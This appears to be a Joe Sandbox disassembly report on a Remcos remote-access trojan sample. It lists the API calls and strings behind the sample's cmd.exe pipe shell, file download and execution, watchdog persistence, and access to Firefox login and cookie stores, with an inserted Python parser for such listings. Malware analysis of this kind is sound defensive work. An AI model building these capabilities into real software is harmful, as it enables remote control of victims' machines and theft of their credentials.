                                                                                                • GetForegroundWindow.USER32 ref: 0041AC74
                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$ForegroundText
                                                                                                • String ID:
                                                                                                • API String ID: 29597999-0
                                                                                                • Opcode ID: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                • Instruction ID: 3cf16c2a8257e52241c70e3f2477159e0ff99a2dafdd86ddfb3cfc0a4d760bbd
                                                                                                • Opcode Fuzzy Hash: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                • Instruction Fuzzy Hash: 56E04875A0031467EB24A765AC4EFDA766C9704715F0000B9BA19D21C3E9B4EA04CBE4
                                                                                                APIs
                                                                                                • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                  • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                  • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                  • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                  • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                  • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                  • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                  • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                  • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                • String ID:
                                                                                                • API String ID: 1170566393-0
                                                                                                • Opcode ID: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                • Instruction ID: 9c65b6197a0e8ce5e429e224625e4c370c9a1848c9e97f9a588a6d75e163472b
                                                                                                • Opcode Fuzzy Hash: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                • Instruction Fuzzy Hash: 4ED05B326406216FB310575D6D01FFBB5DCDFA67617150077F408D7110D6945D82C3AD
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                                • Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                                APIs
                                                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Startup
                                                                                                • String ID:
                                                                                                • API String ID: 724789610-0
                                                                                                • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                APIs
                                                                                                • GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: GdipImageSaveStream
                                                                                                • String ID:
                                                                                                • API String ID: 971487142-0
                                                                                                • Opcode ID: dd4c19a778b4d9c0263e5c3de670e2f7a4c391227e23d672982bbc2967106854
                                                                                                • Instruction ID: c152069da62037acbb56f4ff16b46c421b53e2f7b92aafa5ca67a7c3543cc58a
                                                                                                • Opcode Fuzzy Hash: dd4c19a778b4d9c0263e5c3de670e2f7a4c391227e23d672982bbc2967106854
                                                                                                • Instruction Fuzzy Hash: AEC01232008351AF8B12EF40EC49C6FBFA6FF88710F040C1DF16541130C7219865DB55
                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000045C6,004748F8,00000000,00000000), ref: 004045BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread
                                                                                                • String ID:
                                                                                                • API String ID: 2422867632-0
                                                                                                • Opcode ID: f44f3784240fcd8d7e72620cae152613109fcde0c1516d85c672c4a39e57bca1
                                                                                                • Instruction ID: 01210324b7e8a077b404d8502847c02a9d9eadc8fda39bfa96d67c8057efca6e
                                                                                                • Opcode Fuzzy Hash: f44f3784240fcd8d7e72620cae152613109fcde0c1516d85c672c4a39e57bca1
                                                                                                • Instruction Fuzzy Hash: 9FC048F1A24200BFA610CF20DD49C37B6ECEB90741B21897ABE08D2141E275DD02CA39
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: send
                                                                                                • String ID:
                                                                                                • API String ID: 2809346765-0
                                                                                                • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Deallocate
                                                                                                • String ID:
                                                                                                • API String ID: 1075933841-0
                                                                                                • Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                • Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
                                                                                                • Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                • Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705
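The blocks above are raw output of the Joe Sandbox IDA plugin: one record per disassembled function, each listing the Win32 APIs it calls (directly, or inside a sub-function marked "Part of subcall function"), plus the memory dump and snapshot the code was lifted from. Reading several hundred of these by eye is slow, so here is an added Python parser that turns the listing into a per-module API inventory, groups the sub-function chains, and decodes the two argument patterns worth decoding here (the socket type/protocol words and the WSAStartup version word). It is an added example, not Joe Sandbox code or anything from the report. The sample input is constructed by copying lines from the blocks above. The only inference it makes is the layout of the .sdmp file name (first dotted field is the PID, fourth is the region base); that is an assumption, and the code checks it against the snapshot file name and the stated Offset rather than trusting it.

```python
"""Turn Joe Sandbox IDA-plugin API listings (the '• API.MODULE(args), ref: ADDR'
lines) into a structured call inventory.  Added example, not Joe Sandbox code.
SAMPLE_LISTING is constructed from lines copied out of the blocks above."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

CALL_RE = re.compile(  # a direct call, or one made inside a sub-function
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][\w@$]*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
DUMP_RE = re.compile(r"^\s*•\s*Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*"
                     r"(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")
SNAP_RE = re.compile(r"^\s*•\s*Snapshot File:\s*hcaresult_(?P<pid>\d+)_(?P<snap>\d+)_"
                     r"(?P<base>[0-9A-Fa-f]+)_(?P<proc>[^.]+)\.jbxd")

# Constructed sample: lines copied from the report blocks above.
SAMPLE_LISTING = """\
• socket.WS2_32(?,00000001,00000006), ref: 00404212
  • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
• _free.LIBCMT ref: 0044B9DF
• __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
• getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
• WSASetLastError.WS2_32(00000000), ref: 00413FC1
  • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
  • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
  • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
• GetForegroundWindow.USER32 ref: 0041AC74
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
"""

SOCK_TYPES = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
IPPROTO = {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int                      # address of the call instruction
    via_subcall: Optional[str]    # sub-function address, None for a direct call
    decoded: dict = field(default_factory=dict)


@dataclass
class Listing:
    calls: List[Call] = field(default_factory=list)
    dumps: List[dict] = field(default_factory=list)
    snapshot: Optional[dict] = None


def _hex_arg(s: str) -> Optional[int]:
    """Int for an 8-hex-digit argument; None for '?' or symbolic values."""
    return int(s, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", s) else None


def decode_args(api: str, args: List[str]) -> dict:
    """Decode only argument positions whose meaning is certain; no guessing elsewhere."""
    if api == "socket" and len(args) >= 3:
        typ, proto = _hex_arg(args[1]), _hex_arg(args[2])
        return {"type": SOCK_TYPES.get(typ, typ), "protocol": IPPROTO.get(proto, proto)}
    if api == "WSAStartup" and args and _hex_arg(args[0]) is not None:
        ver = _hex_arg(args[0])                       # MAKEWORD(major, minor)
        return {"version": f"{ver & 0xFF}.{ver >> 8}"}
    return {}


def parse_dump_name(name: str) -> dict:
    """ASSUMPTION (not documented on the page): dotted field 0 is the PID and
    field 3 the region base; dump_matches_snapshot() verifies this."""
    fields = name[: -len(".sdmp")].split(".")
    return {"pid": int(fields[0], 16), "base": int(fields[3], 16), "fields": fields}


def parse_listing(text: str) -> Listing:
    lst = Listing()
    for line in text.splitlines():
        if m := CALL_RE.match(line):
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            call = Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), m.group("sub"))
            call.decoded = decode_args(call.api, call.args)
            lst.calls.append(call)
        elif m := DUMP_RE.match(line):
            info = parse_dump_name(m.group("name"))
            info.update(offset=int(m.group("off"), 16), based_on_pe=m.group("pe") == "true")
            lst.dumps.append(info)
        elif m := SNAP_RE.match(line):
            lst.snapshot = {"pid": int(m.group("pid")), "snapshot": int(m.group("snap")),
                            "base": int(m.group("base"), 16), "process": m.group("proc")}
    return lst


def inventory(lst: Listing) -> dict:
    """Module -> sorted unique API names, direct and sub-function calls alike."""
    out: dict = {}
    for c in lst.calls:
        out.setdefault(c.module, set()).add(c.api)
    return {m: sorted(a) for m, a in sorted(out.items())}


def subcall_chains(lst: Listing) -> dict:
    """Sub-function address -> APIs it calls, in listing order (e.g. the
    GetSystemDirectoryA / LoadLibraryA / GetProcAddress chain under 00413E37)."""
    out: dict = {}
    for c in lst.calls:
        if c.via_subcall:
            out.setdefault(c.via_subcall, []).append(c.api)
    return out


def dump_matches_snapshot(lst: Listing) -> bool:
    """True when every dump's inferred PID/base agrees with the snapshot name and Offset."""
    s = lst.snapshot
    if s is None or not lst.dumps:
        return False
    return all(d["pid"] == s["pid"] and d["base"] == s["base"] == d["offset"] for d in lst.dumps)


if __name__ == "__main__":
    L = parse_listing(SAMPLE_LISTING)
    print(inventory(L))
    print(subcall_chains(L))
    print("dump/snapshot consistent:", dump_matches_snapshot(L))
```

Run over the full report text, the inventory gives you the imported-API surface per module in one screen, and `subcall_chains` isolates resolution chains such as the one under 00413E37 (GetSystemDirectoryA, LoadLibraryA, GetProcAddress "getaddrinfo", FreeLibrary, repeated for a second library). One caveat before reading that chain as deliberate import hiding: the listing shows only "?" for the library names, and the same sequence is what the wspiapi.h getaddrinfo compatibility shim from older Windows SDKs emits, so confirm the DLL names in the dump before drawing a conclusion.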
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                  • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                  • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                  • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                  • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                  • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                  • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                  • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                  • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                  • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                  • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                  • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                • API String ID: 2918587301-599666313
                                                                                                • Opcode ID: 3c7ded4f7b91f9f17cc42a3943528b63886410a8f13f5aa197d5eceae44939b9
                                                                                                • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                                • Opcode Fuzzy Hash: 3c7ded4f7b91f9f17cc42a3943528b63886410a8f13f5aa197d5eceae44939b9
                                                                                                • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                • API String ID: 3815868655-81343324
                                                                                                • Opcode ID: 640d02081630ce81dd3a23a2c8a108a12bd7e4dab00f5e736ae882909f3da4d2
                                                                                                • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                • Opcode Fuzzy Hash: 640d02081630ce81dd3a23a2c8a108a12bd7e4dab00f5e736ae882909f3da4d2
                                                                                                • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                  • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                  • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                  • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                  • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                • API String ID: 65172268-860466531
                                                                                                • Opcode ID: 6373268320b577883abb576b1dd954259a5e9a0d5e37612e608bbbe8abd5bb10
                                                                                                • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                • Opcode Fuzzy Hash: 6373268320b577883abb576b1dd954259a5e9a0d5e37612e608bbbe8abd5bb10
                                                                                                • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                • API String ID: 1164774033-3681987949
                                                                                                • Opcode ID: 1c90d7a3c299169f6363f3f0942c76783c48e0e716f945347037824cffd895d8
                                                                                                • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                • Opcode Fuzzy Hash: 1c90d7a3c299169f6363f3f0942c76783c48e0e716f945347037824cffd895d8
                                                                                                • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$Close$File$FirstNext
                                                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                • API String ID: 3527384056-432212279
                                                                                                • Opcode ID: bb1a5bee213c381b64ddbf92fd809f5da95ece86f667474aed882a00f6a907ed
                                                                                                • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                • Opcode Fuzzy Hash: bb1a5bee213c381b64ddbf92fd809f5da95ece86f667474aed882a00f6a907ed
                                                                                                • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
